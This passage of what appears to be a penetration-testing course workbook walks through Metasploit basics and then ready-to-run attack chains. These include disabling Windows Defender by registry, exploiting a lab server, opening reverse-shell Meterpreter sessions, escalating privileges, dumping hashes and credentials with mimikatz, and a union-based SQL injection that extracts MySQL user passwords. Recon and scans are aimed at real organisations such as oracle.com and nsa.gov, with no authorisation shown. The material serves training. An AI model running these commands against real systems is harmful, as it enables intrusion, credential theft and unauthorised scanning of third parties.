  1005.  
  1006. - Multiple Line String Variable, Interpolation, and Regular Expressions
  1007.  
  1008. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  1009.  
  1010. ---------------------------Type This-----------------------------------
  1011. infosecaddicts = <<mark
  1012. welcome
  1013. to the
  1014. best
  1015. metasploit
  1016. course
  1017. on the
  1018. market
  1019. mark
  1020. puts infosecaddicts
  1021. -----------------------------------------------------------------------
  1022.  
  1023.  
  1024. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  1025. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  1026. Examine the following example to understand how interpolation works in Ruby.
  1027.  
  1028. References:
  1029. https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
  1030.  
  1031.  
  1032. ---------------------------Type This-----------------------------------
  1033. a = 4
  1034. b = 6
  1035. puts "a * b = a*b"
  1036. puts " #{a} * #{b} = #{a*b} "
  1037. person = "Joe McCray"
  1038. puts "IT Security consultant person"
  1039. puts "IT Security consultant #{person}"
  1040. -----------------------------------------------------------------------
  1041.  
  1042. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  1043.  
  1044.  
  1045.  
  1046.  
  1047.  
  1048. - Character classes
  1049. ---------------------------Type This-----------------------------------
  1050. infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
  1051. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  1052. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  1053. -----------------------------------------------------------------------
  1054.  
  1055.  
  1056. - Arrays, Push and Pop, and Hashes
  1057.  
  1058.  
  1059. - In the following example, numbers is an array that holds 6 integer numbers.
  1060.  
  1061.  
  1062. ---------------------------Type This-----------------------------------
  1063. numbers = [2,4,6,8,10,100]
  1064. puts numbers[0]
  1065. puts numbers[4]
  1066. numbers[2] = 150
  1067. puts numbers
  1068. -----------------------------------------------------------------------
  1069.  
  1070.  
  1071.  
  1072. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  1073.  
  1074.  
  1075. ---------------------------Type This-----------------------------------
  1076. framework = []
  1077. framework << "modules"
  1078. framework << "exploits"
  1079. framework << "payloads"
  1080. framework.pop
  1081. framework.shift
  1082. -----------------------------------------------------------------------
  1083.  
  1084. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  1085. that is used to access the element.
  1086.  
  1087.  
  1088. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  1089. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  1090. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  1091.  
  1092. ---------------------------Type This-----------------------------------
  1093. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  1094. print metasploit.size
  1095. print metasploit["microsoft"]
  1096. metasploit['microsoft'] = 'redhat'
  1097. print metasploit['microsoft']
  1098. -----------------------------------------------------------------------
  1099.  
  1100.  
  1101.  
  1102. - Writing Ruby Scripts
  1103.  
  1104.  
  1105. - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
  1106. this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
  1107. someone made to look for a specific port. The port that it is looking for is port 21 FTP.
  1108. ---------------------------Type This-----------------------------------
  1109. cd ~/metasploit-framework/modules/auxiliary/scanner/portscan
  1110. ls
  1111. -----------------------------------------------------------------------
  1112.  
  1113.  
  1114.  
  1115. ###########################
  1116. # Metasploit Fundamentals #
  1117. ###########################
  1118.  
  1119. - Let's take a little look at Metasploit Framework
  1120.  
  1121. - First, we should take note of the different directories, the Modular Architecture.
  1122.  
  1123. The modules that make up the Modular Architecture are
  1124. Exploits
  1125. Auxiliary
  1126. Payload
  1127. Encoder
  1128. Nops
  1129.  
  1130.  
  1131. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  1132.  
  1133. are
  1134.  
  1135. Modules
  1136. Scripts
  1137. Plugins
  1138. External
  1139. Data
  1140. Tools
  1141.  
  1142. - Let's take a look inside the Metasploit directory and see what's the
  1143. ---------------------------Type This-----------------------------------
  1144. cd ~/toolz/metasploit
  1145. ls
  1146. -----------------------------------------------------------------------
  1147.  
  1148.  
  1149.  
  1150. - Now let's take a look inside the Modules directory and see what's there.
  1151. ---------------------------Type This-----------------------------------
  1152. cd ~/metasploit-framework/modules
  1153. ls
  1154. -----------------------------------------------------------------------
  1155.  
  1156.  
  1157. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  1158. not necessarily need to - have a shell or session started on a machine.
  1159.  
  1160. The exploits directory has our modules that we need to pop a shell on a box.
  1161. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  1162. like Burp Suite
  1163. - Let's take a look at the external directory
  1164. ---------------------------Type This-----------------------------------
  1165. cd ~/metasploit-framework/external
  1166. ls
  1167. -----------------------------------------------------------------------
  1168.  
  1169. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  1170. ---------------------------Type This-----------------------------------
  1171. cd ~/metasploit-framework/data
  1172. ls
  1173. -----------------------------------------------------------------------
  1174.  
  1175. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  1176. brute-forcing
  1177. ---------------------------Type This-----------------------------------
  1178. cd ~/metasploit-framework/data/wordlists
  1179. ls
  1180. -----------------------------------------------------------------------
  1181.  
  1182. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  1183. once a session is created.
  1184. ---------------------------Type This-----------------------------------
  1185. cd ~/metasploit-framework/data/meterpreter
  1186. ls
  1187. -----------------------------------------------------------------------
  1188.  
  1189. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  1190. like escalating privileges and dumping hashes.
  1191.  
  1192. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  1193. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  1194. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  1195. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  1196. custom shellcode.
  1197.  
  1198. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  1199. to do with other programs to make things like importing and exporting reports simple.
  1200. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  1201. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  1202. modules we're going to have a better understanding of where everything needs to go.
  1203. ---------------------------Type This-----------------------------------
  1204. cd ~/metasploit-framework/modules/exploits
  1205. ls
  1206. -----------------------------------------------------------------------
  1207.  
  1208.  
  1209. - The exploits directory is split up into several different directories, each one housing exploits for different types
  1210. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  1211. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  1212. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  1213. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  1214. for us.
  1215. ---------------------------Type This-----------------------------------
  1216. cd ~/metasploit-framework/modules/auxiliary/
  1217. ls
  1218. -----------------------------------------------------------------------
  1219.  
  1220.  
  1221. - And a little further into the directory, let's take a look at what's in the scanner directory
  1222. ---------------------------Type This-----------------------------------
  1223. cd ~/metasploit-framework/modules/auxiliary/scanner/
  1224. ls
  1225. -----------------------------------------------------------------------
  1226.  
  1227.  
  1228. - And one more folder deeper into the structure, let's take a look in the portscan folder
  1229. ---------------------------Type This-----------------------------------
  1230. cd ~/metasploit-framework/modules/auxiliary/scanner/portscan
  1231. ls
  1232. -----------------------------------------------------------------------
  1233.  
  1234. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  1235. and report them back to us in a nice, easily readable format.
  1236.  
  1237. cat tcp.rb
  1238.  
  1239.  
  1240.  
  1241. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  1242. once you have a session on a machine.
  1243. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  1244. succeeds.
  1245. ---------------------------Type This-----------------------------------
  1246. cd ~/metasploit-framework/modules/payloads/
  1247. ls
  1248. -----------------------------------------------------------------------
  1249.  
  1250.  
  1251. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  1252. application for it to be used as.
  1253. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  1254. do everything once you have that shell calling back to you.
  1255. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  1256. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  1257. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  1258. to download Stages payloads.
  1259.  
  1260.  
  1261. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  1262. shells.
  1263. ---------------------------Type This-----------------------------------
  1264. cd singles
  1265. cd windows
  1266. ls
  1267. -----------------------------------------------------------------------
  1268.  
  1269.  
  1270. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  1271. see what it actually does.
  1272. ---------------------------Type This-----------------------------------
  1273. cat adduser.rb
  1274. -----------------------------------------------------------------------
  1275.  
  1276. Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  1277. the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
  1278. it gives Windows to add the user to the system.
  1279.  
  1280.  
  1281. - Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
  1282.  
  1283. windows/shell/bind_tcp or windows/shell/reverse_tcp
  1284. ---------------------------Type This-----------------------------------
  1285. cd ../../stagers
  1286. ls
  1287. -----------------------------------------------------------------------
  1288.  
  1289.  
  1290.  
  1291. - Again, we can see that we have stagers for multiple systems and code types.
  1292. ---------------------------Type This-----------------------------------
  1293. ls windows/
  1294. -----------------------------------------------------------------------
  1295.  
  1296.  
  1297. As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
  1298. machine, so we can upload or download our stage payloads and execute commands.
  1299. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  1300. our stagers...
  1301. ---------------------------Type This-----------------------------------
  1302. cd ../stages
  1303. ls
  1304. -----------------------------------------------------------------------
  1305.  
  1306.  
  1307. Again, we can see that our stages are coded for particular operating systems and languages.
  1308. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  1309. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  1310. if any.
  1311.  
  1312. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  1313. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  1314. so we can impersonate other users on the system in hopes of elevating our privileges.
  1315. ---------------------------Type This-----------------------------------
  1316. cd ../../../post/
  1317. ls
  1318. cd windows/
  1319. ls
  1320. -----------------------------------------------------------------------
  1321.  
  1322.  
  1323. Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
  1324. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  1325. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  1326. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
  1327. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  1328.  
  1329. #################################
  1330. # Getting start with MSFConsole #
  1331. #################################
  1332.  
  1333. ---------------------------Type This-----------------------------------
  1334. cd ~/metasploit-framework/
  1335.  
  1336. ./msfconsole
  1337. ----------------------------------------------------------------------
  1338.  
  1339.  
  1340.  
  1341. ##############################################
  1342. # Run any Linux command inside of MSFConsole #
  1343. ##############################################
  1344.  
  1345. Once you are inside of MSFConsole you want to do EVERYTHING
  1346. that you'd normally do in your Linux command shell in addition
  1347. to running Metasploit commands.
  1348.  
  1349.  
  1350. ---------------------------Type This-----------------------------------
  1351. ls
  1352.  
  1353. pwd
  1354.  
  1355. ping -c1 yahoo.com
  1356.  
  1357. nmap yahoo.com
  1358. ----------------------------------------------------------------------
  1359.  
  1360.  
  1361.  
  1362.  
  1363. - You're on the outside scanning publicly accessable targets.
  1364.  
  1365.  
  1366. ---------------------------Type This-----------------------------------
  1367. use auxiliary/scanner/portscan/tcp
  1368.  
  1369. set RHOSTS 217.108.137.200
  1370.  
  1371. set PORTS 80,1433,1521,3306,8000,8080,8081,10000
  1372.  
  1373. run
  1374. ----------------------------------------------------------------------
  1375.  
  1376.  
  1377.  
  1378. - So let's do a quick google search for someone with trace.axd file
  1379. - filetye:axd inurl:trace.axd
  1380. --------------------------Type This-----------------------------------
  1381. use auxiliary/scanner/http/ (press the tab key, then press y to look through the http options)
  1382. ----------------------------------------------------------------------
  1383.  
  1384. - Here is an example:
  1385. ---------------------------Type This-----------------------------------
  1386. use auxiliary/scanner/http/trace_axd
  1387.  
  1388. set RHOSTS 207.20.57.112
  1389.  
  1390. set VHOST www.motion-vr.net
  1391.  
  1392. run
  1393. ----------------------------------------------------------------------
  1394.  
  1395.  
  1396.  
  1397.  
  1398. ---------------------------Type This-----------------------------------
  1399. use auxiliary/scanner/http/http_version
  1400.  
  1401. set RHOSTS 45.77.162.239
  1402.  
  1403. set RPORT 80
  1404.  
  1405. run
  1406. ----------------------------------------------------------------------
  1407.  
  1408.  
  1409. ---------------------------Type This-----------------------------------
  1410. use auxiliary/scanner/http/tomcat_enum
  1411.  
  1412. set RHOSTS 217.108.137.200
  1413.  
  1414. set RPORT 8080
  1415.  
  1416. run
  1417. -----------------------------------------------------------------------
  1418.  
  1419. ################################
  1420. # Exploitation with Metasploit #
  1421. ################################
  1422. Step 1: Disable the firewall on your Windows 10 host
  1423.  
  1424. Step 2: Run your command prompt as an administrator
  1425. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  1426.  
  1427. Step 3: Restart your computer (I'm sorry - I know this sux!)
  1428.  
  1429. Step 4: Start the vulnerable server (no need to turn on OllyDBG)
  1430.  
  1431. Step 5: From your CentoS run the following commands
  1432. ---------------------------Type This-----------------------------------
  1433. cd ~/
  1434.  
  1435. wget https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  1436.  
  1437. unzip ExploitLab.zip
  1438.  
  1439. cd ExploitLab/4-AttackScripts/
  1440.  
  1441. vi vulnserv.rb
  1442.  
  1443. cp vulnserv.rb ~/metasploit-framework/modules/exploits/windows/misc
  1444.  
  1445. cd ~/metasploit-framework/
  1446.  
  1447. ./msfconsole
  1448.  
  1449.  
  1450.  
  1451. use exploit/windows/misc/vulnserv
  1452. set PAYLOAD windows/meterpreter/bind_tcp
  1453. set RHOST [CHANGEME-TO-YOUR-WIN10-IP]
  1454. set RPORT 9999
  1455. exploit
  1456. -----------------------------------------------------------------------
  1457.  
  1458.  
  1459.  
  1460.  
  1461.  
  1462. ###########################
  1463. # Client-Side Enumeration #
  1464. ###########################
  1465.  
  1466.  
  1467.  
  1468. ********************************** Figure out who and where you are **********************************
  1469.  
  1470.  
  1471. ---------------------------Type This-----------------------------------
  1472. meterpreter> sysinfo
  1473.  
  1474.  
  1475. meterpreter> getuid
  1476.  
  1477.  
  1478. meterpreter> ipconfig
  1479.  
  1480.  
  1481. meterpreter> run post/windows/gather/checkvm
  1482.  
  1483. meterpreter> run post/multi/manage/autoroute
  1484. -----------------------------------------------------------------------
  1485.  
  1486.  
  1487. ********************************** Enumerate the host you are on **********************************
  1488.  
  1489.  
  1490. ---------------------------Type This-----------------------------------
  1491. meterpreter > run post/windows/gather/enum_applications
  1492.  
  1493. meterpreter > run post/windows/gather/enum_logged_on_users
  1494.  
  1495. meterpreter > run post/windows/gather/usb_history
  1496.  
  1497. meterpreter > run post/windows/gather/enum_shares
  1498.  
  1499. meterpreter > run post/windows/gather/enum_snmp
  1500.  
  1501. meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
  1502. -----------------------------------------------------------------------
  1503.  
  1504.  
  1505.  
  1506.  
  1507. ********************************** Escalate privileges and get hashes **********************************
  1508.  
  1509.  
  1510. ---------------------------Type This-----------------------------------
  1511. meterpreter> use priv
  1512. -----------------------------------------------------------------------
  1513.  
  1514.  
  1515. --Option 1: GetSystem
  1516. ---------------------------Type This-----------------------------------
  1517. meterpreter> getsystem
  1518. -----------------------------------------------------------------------
  1519.  
  1520. --Option 2:
  1521. ---------------------------Type This-----------------------------------
  1522. meterpreter > run post/windows/escalate/getsystem
  1523. -----------------------------------------------------------------------
  1524.  
  1525. --Option 3:
  1526. ---------------------------Type This-----------------------------------
  1527. meterpreter> background
  1528. back
  1529. use post/windows/escalate/droplnk
  1530. set SESSION 1
  1531. set PAYLOAD windows/meterpreter/reverse_tcp
  1532. set LHOST [ ChangeME to CentOS VM IP ]
  1533. set LPORT 1234
  1534. exploit
  1535. -----------------------------------------------------------------------
  1536.  
  1537. --Option 4:
  1538. ---------------------------Type This-----------------------------------
  1539. use exploit/windows/local/bypassuac
  1540. set SESSION 1
  1541. set PAYLOAD windows/meterpreter/reverse_tcp
  1542. set LHOST [ ChangeME to CentOS VM IP ]
  1543. set LPORT 12345
  1544. exploit
  1545. -----------------------------------------------------------------------
  1546.  
  1547.  
  1548. --Option 5:
  1549. ---------------------------Type This-----------------------------------
  1550. use exploit/windows/local/service_permissions
  1551. set SESSION 1
  1552. set PAYLOAD windows/meterpreter/reverse_tcp
  1553. set LHOST [ ChangeME to CentOS VM IP ]
  1554. set LPORT 5555
  1555. exploit
  1556. -----------------------------------------------------------------------
  1557.  
  1558.  
  1559. --Option 6:
  1560. ---------------------------Type This-----------------------------------
  1561. use exploit/windows/local/trusted_service_path
  1562. set SESSION 1
  1563. set PAYLOAD windows/meterpreter/reverse_tcp
  1564. set LHOST [ ChangeME to CentOS VM IP ]
  1565. set LPORT 4567
  1566. exploit
  1567. -----------------------------------------------------------------------
  1568.  
  1569. --Option 7:
  1570. ---------------------------Type This-----------------------------------
  1571. use exploit/windows/local/ppr_flatten_rec
  1572. set SESSION 1
  1573. set PAYLOAD windows/meterpreter/reverse_tcp
  1574. set LHOST [ ChangeME to CentOS VM IP ]
  1575. set LPORT 7777
  1576. exploit
  1577. -----------------------------------------------------------------------
  1578.  
  1579.  
  1580. --Option 8:
  1581. ---------------------------Type This-----------------------------------
  1582. use exploit/windows/local/ms_ndproxy
  1583. set SESSION 1
  1584. set PAYLOAD windows/meterpreter/reverse_tcp
  1585. set LHOST [ ChangeME to CentOS VM IP ]
  1586. set LPORT 7788
  1587. exploit
  1588. -----------------------------------------------------------------------
  1589.  
  1590. --Option 9:
  1591. ---------------------------Type This-----------------------------------
  1592. use exploit/windows/local/ask
  1593. set SESSION 1
  1594. set PAYLOAD windows/meterpreter/reverse_tcp
  1595. set LHOST [ ChangeME to CentOS VM IP ]
  1596. set LPORT 7799
  1597. exploit
  1598. -----------------------------------------------------------------------
  1599.  
  1600.  
  1601. A window will pop up and you need to click Yes in order to get your new meterpreter shell
  1602.  
  1603.  
  1604. meterpreter > getuid
  1605.  
  1606. meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
  1607.  
  1608. meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
  1609.  
  1610. meterpreter > getsystem
  1611. ...got system (via technique 1).
  1612.  
  1613.  
  1614. meterpreter > getuid
  1615. Server username: NT AUTHORITY\SYSTEM
  1616.  
  1617.  
  1618. meterpreter> run post/windows/gather/hashdump
  1619.  
  1620. meterpreter> run post/windows/gather/credentials/credential_collector
  1621. -----------------------------------------------------------------------
  1622.  
  1623.  
  1624. ********************************** Steal Tokens **********************************
  1625.  
  1626. ---------------------------Type This-----------------------------------
  1627. meterpreter > getsystem
  1628.  
  1629. meterpreter > use incognito
  1630.  
  1631. meterpreter > list_tokens -u
  1632.  
  1633. meterpreter > list_tokens -g
  1634.  
  1635. meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
  1636.  
  1637. meterpreter> getuid
  1638. -----------------------------------------------------------------------
  1639.  
  1640.  
  1641. ************ Stealing credentials and certificates ************
  1642. - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
  1643.  
  1644. ---------------------------Type This-----------------------------------
  1645. meterpreter > getsystem
  1646.  
  1647. meterpreter > load mimikatz
  1648.  
  1649. meterpreter > kerberos
  1650.  
  1651. meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
  1652.  
  1653. meterpreter > msv <-- Your AD password
  1654.  
  1655. meterpreter > livessp <-- Your Windows8 password
  1656.  
  1657. meterpreter > ssp <-- Your outlook password
  1658.  
  1659. meterpreter > tspkg <-- Your AD password
  1660.  
  1661. meterpreter > wdigest <-- Your AD password
  1662.  
  1663. meterpreter > mimikatz_command -f crypto::listStores
  1664.  
  1665. meterpreter > mimikatz_command -f crypto::listCertificates
  1666.  
  1667. meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
  1668.  
  1669. meterpreter > mimikatz_command -f crypto::patchcapi
  1670.  
  1671. meterpreter> search -d <directory> -f <file-pattern>
  1672. -----------------------------------------------------------------------
  1673.  
  1674.  
  1675. ###################################################
  1676. # Day 4: Identifying External Security Mechanisms #
  1677. ###################################################
  1678.  
  1679.  
  1680.  
  1681. ###########################
  1682. # Target IP Determination #
  1683. ###########################
  1684. ---------------------------Type This-----------------------------------
  1685. cd ~/
  1686.  
  1687. wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
  1688.  
  1689. perl blindcrawl.pl -d motorola.com
  1690. -----------------------------------------------------------------------
  1691.  
  1692.  
  1693. -- Take each IP address and look ip up here:
  1694. http://whois.domaintools.com/
  1695.  
  1696.  
  1697.  
  1698. Zone Transfer fails on most domains, but here is an example of one that works:
  1699. ---------------------------Type This-----------------------------------
  1700. dig axfr @nsztm1.digi.ninja zonetransfer.me
  1701.  
  1702.  
  1703. cd ~/
  1704.  
  1705. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  1706.  
  1707. gcc ipcrawl.c -o ipcrawl
  1708.  
  1709. chmod 777 ipcrawl
  1710.  
  1711. ./ipcrawl 148.87.1.1 148.87.1.254
  1712.  
  1713.  
  1714. sudo nmap -sL 148.87.1.0-255
  1715.  
  1716.  
  1717. sudo nmap -sL 148.87.1.0-255 | grep oracle
  1718.  
  1719. -----------------------------------------------------------------------
  1720.  
  1721.  
  1722.  
  1723.  
  1724. ###########################
  1725. # Load Balancer Detection #
  1726. ###########################
  1727.  
  1728. Here are some options to use for identifying load balancers:
  1729. - http://toolbar.netcraft.com/site_report
  1730. - https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
  1731.  
  1732.  
  1733. Here are some command-line options to use for identifying load balancers:
  1734. ---------------------------Type This-----------------------------------
  1735. dig microsoft.com
  1736.  
  1737. cd ~/
  1738.  
  1739. wget https://raw.githubusercontent.com/craig/ge.mine.nu/master/lbd/lbd.sh
  1740.  
  1741. chmod +x lbd.sh
  1742.  
  1743. ./lbd.sh microsoft.com
  1744.  
  1745. git clone https://github.com/jmbr/halberd.git
  1746. cd halberd/
  1747. sudo python setup.py install
  1748. cd ~
  1749.  
  1750.  
  1751. halberd microsoft.com
  1752. halberd motorola.com
  1753. halberd oracle.com
  1754. -----------------------------------------------------------------------
  1755.  
  1756.  
  1757. ######################################
  1758. # Web Application Firewall Detection #
  1759. ######################################
  1760. ---------------------------Type This-----------------------------------
  1761.  
  1762. sudo nmap -p 80 --script http-waf-detect.nse oracle.com
  1763.  
  1764.  
  1765. sudo nmap -p 80 --script http-waf-detect.nse nsa.gov
  1766.  
  1767. -----------------------------------------------------------------------
  1768.  
  1769.  
  1770. ########################
  1771. # Scanning Methodology #
  1772. ########################
  1773.  
  1774. - Ping Sweep
  1775. What's alive?
  1776. ------------
  1777.  
  1778. ---------------------------Type This-----------------------------------
  1779. sudo nmap -sP 157.166.226.*
  1780.  
  1781. -----------------------------------------------------------------------
  1782.  
  1783.  
  1784.  
  1785. -if -SP yields no results try:
  1786. ---------------------------Type This-----------------------------------
  1787. sudo nmap -sL 157.166.226.*
  1788.  
  1789. -----------------------------------------------------------------------
  1790.  
  1791.  
  1792.  
  1793. -Look for hostnames:
  1794. ---------------------------Type This-----------------------------------
  1795. sudo nmap -sL 157.166.226.* | grep com
  1796.  
  1797. -----------------------------------------------------------------------
  1798.  
  1799.  
  1800.  
  1801. - Port Scan
  1802. What's where?
  1803. ------------
  1804. ---------------------------Type This-----------------------------------
  1805. sudo nmap -sS 162.243.126.247
  1806.  
  1807. -----------------------------------------------------------------------
  1808.  
  1809.  
  1810.  
  1811. - Bannergrab/Version Query
  1812. What versions of software are running
  1813. -------------------------------------
  1814.  
  1815. ---------------------------Type This-----------------------------------
  1816. sudo nmap -sV 162.243.126.247
  1817.  
  1818. -----------------------------------------------------------------------
  1819.  
  1820.  
  1821.  
  1822.  
  1823. - Vulnerability Research
  1824. Lookup the banner versions for public exploits
  1825. ----------------------------------------------
  1826. http://exploit-db.com
  1827. http://securityfocus.com/bid
  1828. https://packetstormsecurity.com/files/tags/exploit/
  1829.  
  1830.  
  1831. ##################################
  1832. # Basic: Web Application Testing #
  1833. ##################################
  1834.  
  1835. Most people are going to tell you reference the OWASP Testing guide.
  1836. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
  1837.  
  1838. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
  1839.  
  1840.  
  1841. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
  1842.  
  1843. 1. Does the website talk to a DB?
  1844. - Look for parameter passing (ex: site.com/page.php?id=4)
  1845. - If yes - try SQL Injection
  1846.  
  1847. 2. Can I or someone else see what I type?
  1848. - If yes - try XSS
  1849.  
  1850. 3. Does the page reference a file?
  1851. - If yes - try LFI/RFI
  1852.  
  1853. Let's start with some manual testing against 45.77.162.239
  1854.  
  1855.  
  1856.  
  1857.  
  1858. Go to LAMP Target homepage
  1859. ---------------------------Paste this into Firefox-----------------------------------
  1860. http://45.63.104.73/
  1861. -------------------------------------------------------------------------------------
  1862.  
  1863.  
  1864. Clicking on the Acer Link:
  1865. ---------------------------Paste this into Firefox-----------------------------------
  1866. http://45.63.104.73/acre2.php?lap=acer
  1867. -------------------------------------------------------------------------------------
  1868.  
  1869. - Found parameter passing (answer yes to question 1)
  1870. - Insert ' to test for SQLI
  1871.  
  1872. ---------------------------Paste this into Firefox-----------------------------------
  1873. http://45.63.104.73/acre2.php?lap=acer'
  1874. -------------------------------------------------------------------------------------
  1875.  
  1876. Page returns the following error:
  1877. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
  1878.  
  1879.  
  1880.  
  1881. In order to perform union-based sql injection - we must first determine the number of columns in this query.
  1882. We do this using the ORDER BY
  1883. ---------------------------Paste this into Firefox-----------------------------------
  1884. http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
  1885. -------------------------------------------------------------------------------------
  1886.  
  1887.  
  1888. Page returns the following error:
  1889. Unknown column '100' in 'order clause'
  1890.  
  1891.  
  1892. ---------------------------Paste this into Firefox-----------------------------------
  1893. http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
  1894. -------------------------------------------------------------------------------------
  1895.  
  1896.  
  1897. Page returns the following error:
  1898. Unknown column '50' in 'order clause'
  1899.  
  1900.  
  1901. ---------------------------Paste this into Firefox-----------------------------------
  1902. http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
  1903. -------------------------------------------------------------------------------------
  1904.  
  1905. Page returns the following error:
  1906. Unknown column '25' in 'order clause'
  1907.  
  1908.  
  1909. ---------------------------Paste this into Firefox-----------------------------------
  1910. http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
  1911. -------------------------------------------------------------------------------------
  1912.  
  1913. Page returns the following error:
  1914. Unknown column '12' in 'order clause'
  1915.  
  1916.  
  1917. ---------------------------Paste this into Firefox-----------------------------------
  1918. http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
  1919. -------------------------------------------------------------------------------------
  1920. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
  1921.  
  1922.  
  1923.  
  1924. Now we build out the union all select statement with the correct number of columns
  1925.  
  1926. Reference:
  1927. http://www.techonthenet.com/sql/union.php
  1928.  
  1929.  
  1930. ---------------------------Paste this into Firefox-----------------------------------
  1931. http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
  1932. -------------------------------------------------------------------------------------
  1933.  
  1934.  
  1935.  
  1936. Now we negate the parameter value 'acer' by turning into the word 'null':
  1937.  
  1938. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
  1939. -------------------------------------------------------------------------------------
  1940.  
  1941. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
  1942.  
  1943.  
  1944. Use a cheat sheet for syntax:
  1945. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  1946.  
  1947. ---------------------------Paste these one line at a time into Firefox-----------------------------------
  1948. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
  1949.  
  1950. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
  1951.  
  1952. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
  1953.  
  1954. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
  1955.  
  1956. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
